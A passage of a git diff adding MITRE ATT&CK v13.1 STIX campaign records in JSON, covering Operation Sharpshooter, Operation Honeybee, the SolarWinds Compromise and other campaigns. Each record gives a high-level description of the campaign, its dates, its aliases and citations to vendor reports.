Retrieved May 11, 2020.", + "url": "https://blog.talosintelligence.com/2019/06/frankenstein-campaign.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "enterprise-attack" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--37764c78-2a99-46d1-a7ea-6454b9bf93a0.json b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--37764c78-2a99-46d1-a7ea-6454b9bf93a0.json new file mode 100644 index 0000000000000000000000000000000000000000..c5b9520b075212f902bc1d9f4881e4eb745d552e --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--37764c78-2a99-46d1-a7ea-6454b9bf93a0.json 
@@ -0,0 +1,56 @@ +{ + "type": "bundle", + "id": "bundle--059f1f97-6910-48cc-ac18-632472677500", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-13T17:10:55.334Z", + "name": "Operation Sharpshooter", + "description": "[Operation Sharpshooter](https://attack.mitre.org/campaigns/C0013) was a global cyber espionage campaign that targeted nuclear, defense, government, energy, and financial companies, with many located in Germany, Turkey, the United Kingdom, and the United States. Security researchers noted the campaign shared many similarities with previous [Lazarus Group](https://attack.mitre.org/groups/G0032) operations, including fake job recruitment lures and shared malware code.(Citation: McAfee Sharpshooter December 2018)(Citation: Bleeping Computer Op Sharpshooter March 2019)(Citation: Threatpost New Op Sharpshooter Data March 2019) ", + "aliases": [ + "Operation Sharpshooter" + ], + "first_seen": "2017-09-01T05:00:00.000Z", + "last_seen": "2019-03-01T06:00:00.000Z", + "x_mitre_first_seen_citation": "(Citation: Threatpost New Op Sharpshooter Data March 2019)", + "x_mitre_last_seen_citation": "(Citation: Threatpost New Op Sharpshooter Data March 2019)", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "campaign", + "id": "campaign--37764c78-2a99-46d1-a7ea-6454b9bf93a0", + "created": "2022-09-26T21:18:34.075Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0013", + "external_id": "C0013" + }, + { + "source_name": "Bleeping Computer Op Sharpshooter March 2019", + "description": "I. Ilascu. (2019, March 3). Op 'Sharpshooter' Connected to North Korea's Lazarus Group. 
Retrieved September 26, 2022.", + "url": "https://www.bleepingcomputer.com/news/security/op-sharpshooter-connected-to-north-koreas-lazarus-group/" + }, + { + "source_name": "Threatpost New Op Sharpshooter Data March 2019", + "description": "L. O'Donnell. (2019, March 3). RSAC 2019: New Operation Sharpshooter Data Reveals Higher Complexity, Scope. Retrieved September 26, 2022.", + "url": "https://threatpost.com/sharpshooter-complexity-scope/142359/" + }, + { + "source_name": "McAfee Sharpshooter December 2018", + "description": "Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020.", + "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.0.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "enterprise-attack" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--4553292d-12c6-4a93-934d-12160370d4e0.json b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--4553292d-12c6-4a93-934d-12160370d4e0.json new file mode 100644 index 0000000000000000000000000000000000000000..1a9d8f519a5806d5e94ef3481691e348a3a8c693 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--4553292d-12c6-4a93-934d-12160370d4e0.json 
@@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--b4105644-3f00-401a-9fde-49b261d43c99", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-13T17:57:06.034Z", + "name": "Operation Honeybee", + "description": "[Operation Honeybee](https://attack.mitre.org/campaigns/C0006) was a campaign that targeted humanitarian aid and inter-Korean affairs organizations from at least late 2017 through early 2018. [Operation Honeybee](https://attack.mitre.org/campaigns/C0006) initially targeted South Korea, but expanded to include Vietnam, Singapore, Japan, Indonesia, Argentina, and Canada. Security researchers assessed the threat actors were likely Korean speakers based on metadata used in both lure documents and executables, and named the campaign \"Honeybee\" after the author name discovered in malicious Word documents.(Citation: McAfee Honeybee) ", + "aliases": [ + "Operation Honeybee" + ], + "first_seen": "2017-08-01T05:00:00.000Z", + "last_seen": "2018-02-01T06:00:00.000Z", + "x_mitre_first_seen_citation": "(Citation: McAfee Honeybee)", + "x_mitre_last_seen_citation": "(Citation: McAfee Honeybee)", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "campaign", + "id": "campaign--4553292d-12c6-4a93-934d-12160370d4e0", + "created": "2022-09-16T21:08:54.358Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0006", + "external_id": "C0006" + }, + { + "source_name": "McAfee Honeybee", + "description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. 
Retrieved May 16, 2018.", + "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.0.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "enterprise-attack" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--4603cf2f-06d0-4970-9c5d-5071b08c817f.json b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--4603cf2f-06d0-4970-9c5d-5071b08c817f.json new file mode 100644 index 0000000000000000000000000000000000000000..ff79ef13d6c4e4a400821ae469bb49c16b3d1deb --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--4603cf2f-06d0-4970-9c5d-5071b08c817f.json 
@@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--8af8cf8e-c819-4231-939e-b1436a31ebd6", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-09-30T21:05:22.490Z", + "name": "Operation Dust Storm", + "description": "[Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) was a long-standing persistent cyber espionage campaign that targeted multiple industries in Japan, South Korea, the United States, Europe, and several Southeast Asian countries. By 2015, the [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) threat actors shifted from government and defense-related intelligence targets to Japanese companies or Japanese subdivisions of larger foreign organizations supporting Japan's critical infrastructure, including electricity generation, oil and natural gas, finance, transportation, and construction.(Citation: Cylance Dust Storm)\n\n[Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) threat actors also began to use Android backdoors in their operations by 2015, with all identified victims at the time residing in Japan or South Korea.(Citation: Cylance Dust Storm)", + "aliases": [ + "Operation Dust Storm" + ], + "first_seen": "2010-01-01T07:00:00.000Z", + "last_seen": "2016-02-01T06:00:00.000Z", + "x_mitre_first_seen_citation": "(Citation: Cylance Dust Storm)", + "x_mitre_last_seen_citation": "(Citation: Cylance Dust Storm)", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "campaign", + "id": "campaign--4603cf2f-06d0-4970-9c5d-5071b08c817f", + "created": "2022-09-29T20:00:38.136Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0016", + "external_id": "C0016" + }, + { + "source_name": "Cylance Dust Storm", + "description": "Gross, J. (2016, February 23). Operation Dust Storm. 
Retrieved December 22, 2021.", + "url": "https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.0.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--4c840263-bbda-440d-a22b-674679ddebf1.json b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--4c840263-bbda-440d-a22b-674679ddebf1.json new file mode 100644 index 0000000000000000000000000000000000000000..f60ecd8550b67bad67c367b64d5644035f7ed98a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--4c840263-bbda-440d-a22b-674679ddebf1.json 
@@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--aa7bf7ef-2a78-473b-a3c2-1d2c26aa879c", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-10-13T13:06:44.395Z", + "name": "Operation Spalax", + "description": "[Operation Spalax](https://attack.mitre.org/campaigns/C0005) was a campaign that primarily targeted Colombian government organizations and private companies, particularly those associated with the energy and metallurgical industries. The [Operation Spalax](https://attack.mitre.org/campaigns/C0005) threat actors distributed commodity malware and tools using generic phishing topics related to COVID-19, banking, and law enforcement action. Security researchers noted indicators of compromise and some infrastructure overlaps with other campaigns dating back to April 2018, including at least one separately attributed to [APT-C-36](https://attack.mitre.org/groups/G0099), however identified enough differences to report this as separate, unattributed activity.(Citation: ESET Operation Spalax Jan 2021) ", + "aliases": [ + "Operation Spalax" + ], + "first_seen": "2019-11-01T05:00:00.000Z", + "last_seen": "2021-01-01T06:00:00.000Z", + "x_mitre_first_seen_citation": "(Citation: ESET Operation Spalax Jan 2021)", + "x_mitre_last_seen_citation": "(Citation: ESET Operation Spalax Jan 2021)", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "campaign", + "id": "campaign--4c840263-bbda-440d-a22b-674679ddebf1", + "created": "2022-09-16T15:32:41.893Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0005", + "external_id": "C0005" + }, + { + "source_name": "ESET Operation Spalax Jan 2021", + "description": "M. Porolli. (2021, January 21). Operation Spalax: Targeted malware attacks in Colombia. 
Retrieved September 16, 2022.", + "url": "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.0.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "enterprise-attack" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--519ee082-8ab6-439b-988f-a8a3f02c8d30.json b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--519ee082-8ab6-439b-988f-a8a3f02c8d30.json new file mode 100644 index 0000000000000000000000000000000000000000..814a9275dd9ca59b2b7a4609eb2aa959b0dc2e6e --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--519ee082-8ab6-439b-988f-a8a3f02c8d30.json 
@@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--b8160102-bc8e-45c8-a186-25f99fdf99f8", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-02-14T16:34:50.791Z", + "name": "C0018", + "description": "\n[C0018](https://attack.mitre.org/campaigns/C0018) was a month-long ransomware intrusion that successfully deployed [AvosLocker](https://attack.mitre.org/software/S1053) onto a compromised network. The unidentified actors gained initial access to the victim network through an exposed server and used a variety of open-source tools prior to executing [AvosLocker](https://attack.mitre.org/software/S1053).(Citation: Costa AvosLocker May 2022)(Citation: Cisco Talos Avos Jun 2022)", + "aliases": [ + "C0018" + ], + "first_seen": "2022-02-01T05:00:00.000Z", + "last_seen": "2022-03-01T05:00:00.000Z", + "x_mitre_first_seen_citation": "(Citation: Cisco Talos Avos Jun 2022)", + "x_mitre_last_seen_citation": "(Citation: Cisco Talos Avos Jun 2022)", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Flavio Costa, Cisco" + ], + "type": "campaign", + "id": "campaign--519ee082-8ab6-439b-988f-a8a3f02c8d30", + "created": "2023-01-17T21:42:34.998Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0018", + "external_id": "C0018" + }, + { + "source_name": "Costa AvosLocker May 2022", + "description": "Costa, F. (2022, May 1). RaaS AvosLocker Incident Response Analysis. Retrieved January 11, 2023.", + "url": "https://www.linkedin.com/pulse/raas-avoslocker-incident-response-analysis-fl%C3%A1vio-costa?trk=articles_directory" + }, + { + "source_name": "Cisco Talos Avos Jun 2022", + "description": "Venere, G. Neal, C. (2022, June 21). Avos ransomware group expands with new attack arsenal. 
Retrieved January 11, 2023.", + "url": "https://blog.talosintelligence.com/avoslocker-new-arsenal/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "enterprise-attack" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--712e38c3-a656-426a-9b3b-a6bfb63294c6.json b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--712e38c3-a656-426a-9b3b-a6bfb63294c6.json new file mode 100644 index 0000000000000000000000000000000000000000..5c0ffb5ade6cce08b4c3381bf5931b35c7c82e11 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--712e38c3-a656-426a-9b3b-a6bfb63294c6.json 
@@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--6bf4b3d6-7ad3-44b2-ae88-7dc8feca627e", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-05T16:50:07.875Z", + "name": "C0021", + "description": "[C0021](https://attack.mitre.org/campaigns/C0021) was a spearphishing campaign conducted in November 2018 that targeted public sector institutions, non-governmental organizations (NGOs), educational institutions, and private-sector corporations in the oil and gas, chemical, and hospitality industries. The majority of targets were located in the US, particularly in and around Washington D.C., with other targets located in Europe, Hong Kong, India, and Canada. [C0021](https://attack.mitre.org/campaigns/C0021)'s technical artifacts, tactics, techniques, and procedures (TTPs), and targeting overlap with previous suspected [APT29](https://attack.mitre.org/groups/G0016) activity.(Citation: Microsoft Unidentified Dec 2018)(Citation: FireEye APT29 Nov 2018)", + "aliases": [ + "C0021" + ], + "first_seen": "2018-11-01T05:00:00.000Z", + "last_seen": "2018-11-01T05:00:00.000Z", + "x_mitre_first_seen_citation": "(Citation: FireEye APT29 Nov 2018)(Citation: Microsoft Unidentified Dec 2018)", + "x_mitre_last_seen_citation": "(Citation: FireEye APT29 Nov 2018)(Citation: Microsoft Unidentified Dec 2018)", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "campaign", + "id": "campaign--712e38c3-a656-426a-9b3b-a6bfb63294c6", + "created": "2023-03-15T19:23:36.696Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0021", + "external_id": "C0021" + }, + { + "source_name": "FireEye APT29 Nov 2018", + "description": "Dunwoody, M., et al. (2018, November 19). Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign. 
Retrieved November 27, 2018.", + "url": "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html" + }, + { + "source_name": "Microsoft Unidentified Dec 2018", + "description": "Microsoft Defender Research Team. (2018, December 3). Analysis of cyberattack on U.S. think tanks, non-profits, public sector by unidentified attackers. Retrieved April 15, 2019.", + "url": "https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "enterprise-attack" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--78068e68-4124-4243-b6f4-76e4e5be8a06.json b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--78068e68-4124-4243-b6f4-76e4e5be8a06.json new file mode 100644 index 0000000000000000000000000000000000000000..e9a81df98cbfc8fc3f924290a34bfe7a4deaba62 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--78068e68-4124-4243-b6f4-76e4e5be8a06.json 
@@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--0be53071-d0d2-4eb2-9a91-0fecba7f9ee8", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-09-29T20:37:46.689Z", + "name": "C0015", + "description": "[C0015](https://attack.mitre.org/campaigns/C0015) was a ransomware intrusion during which the unidentified attackers used [Bazar](https://attack.mitre.org/software/S0534), [Cobalt Strike](https://attack.mitre.org/software/S0154), and [Conti](https://attack.mitre.org/software/S0575), along with other tools, over a 5 day period. Security researchers assessed the actors likely used the widely-circulated [Conti](https://attack.mitre.org/software/S0575) ransomware playbook based on the observed pattern of activity and operator errors.(Citation: DFIR Conti Bazar Nov 2021)", + "aliases": [ + "C0015" + ], + "first_seen": "2021-08-01T05:00:00.000Z", + "last_seen": "2021-08-01T05:00:00.000Z", + "x_mitre_first_seen_citation": "(Citation: DFIR Conti Bazar Nov 2021)", + "x_mitre_last_seen_citation": "(Citation: DFIR Conti Bazar Nov 2021)", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Matt Brenton, Zurich Insurance Group" + ], + "type": "campaign", + "id": "campaign--78068e68-4124-4243-b6f4-76e4e5be8a06", + "created": "2022-09-29T16:42:29.364Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0015", + "external_id": "C0015" + }, + { + "source_name": "DFIR Conti Bazar Nov 2021", + "description": "DFIR Report. (2021, November 29). CONTInuing the Bazar Ransomware Story. 
Retrieved September 29, 2022.", + "url": "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.0.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "enterprise-attack" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--7854c1a0-f06c-4876-98a4-4bbd34751b05.json b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--7854c1a0-f06c-4876-98a4-4bbd34751b05.json new file mode 100644 index 0000000000000000000000000000000000000000..77ba571c16adb23111e082fca1de93ff8a27c9c0 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--7854c1a0-f06c-4876-98a4-4bbd34751b05.json 
@@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--4f2bbbf0-fd44-4cf5-a7e0-e58a6687ed5e", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-06T20:25:30.658Z", + "name": "Operation Ghost", + "description": "[Operation Ghost](https://attack.mitre.org/campaigns/C0023) was an [APT29](https://attack.mitre.org/groups/G0016) campaign starting in 2013 that included operations against ministries of foreign affairs in Europe and the Washington, D.C. embassy of a European Union country. During [Operation Ghost](https://attack.mitre.org/campaigns/C0023), [APT29](https://attack.mitre.org/groups/G0016) used new families of malware and leveraged web services, steganography, and unique C2 infrastructure for each victim.(Citation: ESET Dukes October 2019)\n", + "aliases": [ + "Operation Ghost" + ], + "first_seen": "2013-09-01T04:00:00.000Z", + "last_seen": "2019-10-01T04:00:00.000Z", + "x_mitre_first_seen_citation": "(Citation: ESET Dukes October 2019)", + "x_mitre_last_seen_citation": "(Citation: ESET Dukes October 2019)", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "campaign", + "id": "campaign--7854c1a0-f06c-4876-98a4-4bbd34751b05", + "created": "2023-03-23T17:51:58.539Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0023", + "external_id": "C0023" + }, + { + "source_name": "ESET Dukes October 2019", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. 
Retrieved September 23, 2020.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "enterprise-attack" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--808d6b30-df4e-4341-8248-724da4bac650.json b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--808d6b30-df4e-4341-8248-724da4bac650.json new file mode 100644 index 0000000000000000000000000000000000000000..062d2c874c4a15b1727a89f500a0a74530243253 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/campaign/campaign--808d6b30-df4e-4341-8248-724da4bac650.json 
@@ -0,0 +1,106 @@ +{ + "type": "bundle", + "id": "bundle--34b0598f-e515-4c04-adfa-9e6f6fabbf00", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-14T00:41:06.231Z", + "name": "SolarWinds Compromise", + "description": "The [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024) was a sophisticated supply chain cyber operation conducted by [APT29](https://attack.mitre.org/groups/G0016) that was discovered in mid-December 2020. [APT29](https://attack.mitre.org/groups/G0016) used customized malware to inject malicious code into the SolarWinds Orion software build process that was later distributed through a normal software update; they also used password spraying, token theft, API abuse, spear phishing, and other supply chain attacks to compromise user accounts and leverage their associated access. Victims of this campaign included government, consulting, technology, telecom, and other organizations in North America, Europe, Asia, and the Middle East. Industry reporting initially referred to the actors involved in this campaign as UNC2452, NOBELIUM, StellarParticle, Dark Halo, and SolarStorm.(Citation: SolarWinds Advisory Dec 2020)(Citation: SolarWinds Sunburst Sunspot Update January 2021)(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Volexity SolarWinds)(Citation: CrowdStrike StellarParticle January 2022)(Citation: Unit 42 SolarStorm December 2020)(Citation: Microsoft Analyzing Solorigate Dec 2020)(Citation: Microsoft Internal Solorigate Investigation Blog) \n\nIn April 2021, the US and UK governments attributed the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024) to Russia's Foreign Intelligence Service (SVR); public statements included citations to [APT29](https://attack.mitre.org/groups/G0016), Cozy Bear, and The Dukes.(Citation: NSA Joint Advisory SVR SolarWinds April 2021)(Citation: UK NSCS Russia SolarWinds April 2021)(Citation: Mandiant UNC2452 APT29 April 2022) The US government assessed that of the 
approximately 18,000 affected public and private sector customers of Solar Winds\u2019 Orion product, a much smaller number were compromised by follow-on [APT29](https://attack.mitre.org/groups/G0016) activity on their systems.(Citation: USG Joint Statement SolarWinds January 2021) ", + "aliases": [ + "SolarWinds Compromise" + ], + "first_seen": "2019-08-01T05:00:00.000Z", + "last_seen": "2021-01-01T06:00:00.000Z", + "x_mitre_first_seen_citation": "(Citation: Unit 42 SolarStorm December 2020)", + "x_mitre_last_seen_citation": "(Citation: MSTIC NOBELIUM May 2021)", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "campaign", + "id": "campaign--808d6b30-df4e-4341-8248-724da4bac650", + "created": "2023-03-24T14:59:26.744Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0024", + "external_id": "C0024" + }, + { + "source_name": "Volexity SolarWinds", + "description": "Cash, D. et al. (2020, December 14). Dark Halo Leverages SolarWinds Compromise to Breach Organizations. Retrieved December 29, 2020.", + "url": "https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/" + }, + { + "source_name": "CrowdStrike StellarParticle January 2022", + "description": "CrowdStrike. (2022, January 27). Early Bird Catches the Wormhole: Observations from the StellarParticle Campaign. Retrieved February 7, 2022.", + "url": "https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/" + }, + { + "source_name": "USG Joint Statement SolarWinds January 2021", + "description": "FBI, CISA, ODNI, NSA. (2022, January 5). Joint Statement by the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Office of the Director of National Intelligence (ODNI), and the National Security Agency (NSA). 
Retrieved March 26, 2023.", + "url": "https://www.cisa.gov/news-events/news/joint-statement-federal-bureau-investigation-fbi-cybersecurity-and-infrastructure" + }, + { + "source_name": "FireEye SUNBURST Backdoor December 2020", + "description": "FireEye. (2020, December 13). Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor. Retrieved January 4, 2021.", + "url": "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html" + }, + { + "source_name": "Mandiant UNC2452 APT29 April 2022", + "description": "Mandiant. (2020, April 27). Assembling the Russian Nesting Doll: UNC2452 Merged into APT29. Retrieved March 26, 2023.", + "url": "https://www.mandiant.com/resources/blog/unc2452-merged-into-apt29" + }, + { + "source_name": "MSTIC NOBELIUM May 2021", + "description": "Microsoft Threat Intelligence Center (MSTIC). (2021, May 27). New sophisticated email-based attack from NOBELIUM. Retrieved May 28, 2021.", + "url": "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/" + }, + { + "source_name": "Microsoft Internal Solorigate Investigation Blog", + "description": "MSRC Team. (2021, February 18). Microsoft Internal Solorigate Investigation \u2013 Final Update. Retrieved May 14, 2021.", + "url": "https://msrc-blog.microsoft.com/2021/02/18/microsoft-internal-solorigate-investigation-final-update/" + }, + { + "source_name": "Microsoft Analyzing Solorigate Dec 2020", + "description": "MSTIC. (2020, December 18). Analyzing Solorigate, the compromised DLL file that started a sophisticated cyberattack, and how Microsoft Defender helps protect customers . 
Retrieved January 5, 2021.", + "url": "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/" + }, + { + "source_name": "NSA Joint Advisory SVR SolarWinds April 2021", + "description": "NSA, FBI, DHS. (2021, April 15). Russian SVR Targets U.S. and Allied Networks. Retrieved April 16, 2021.", + "url": "https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF" + }, + { + "source_name": "SolarWinds Advisory Dec 2020", + "description": "SolarWinds. (2020, December 24). SolarWinds Security Advisory. Retrieved February 22, 2021.", + "url": "https://www.solarwinds.com/sa-overview/securityadvisory" + }, + { + "source_name": "SolarWinds Sunburst Sunspot Update January 2021", + "description": "Sudhakar Ramakrishna . (2021, January 11). New Findings From Our Investigation of SUNBURST. Retrieved January 13, 2021.", + "url": "https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/" + }, + { + "source_name": "UK NSCS Russia SolarWinds April 2021", + "description": "UK NCSC. (2021, April 15). UK and US call out Russia for SolarWinds compromise. Retrieved April 16, 2021.", + "url": "https://www.ncsc.gov.uk/news/uk-and-us-call-out-russia-for-solarwinds-compromise" + }, + { + "source_name": "Unit 42 SolarStorm December 2020", + "description": "Unit 42. (2020, December 23). SolarStorm Supply Chain Attack Timeline. Retrieved March 24, 2023.", + "url": "https://unit42.paloaltonetworks.com/solarstorm-supply-chain-attack-timeline/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": 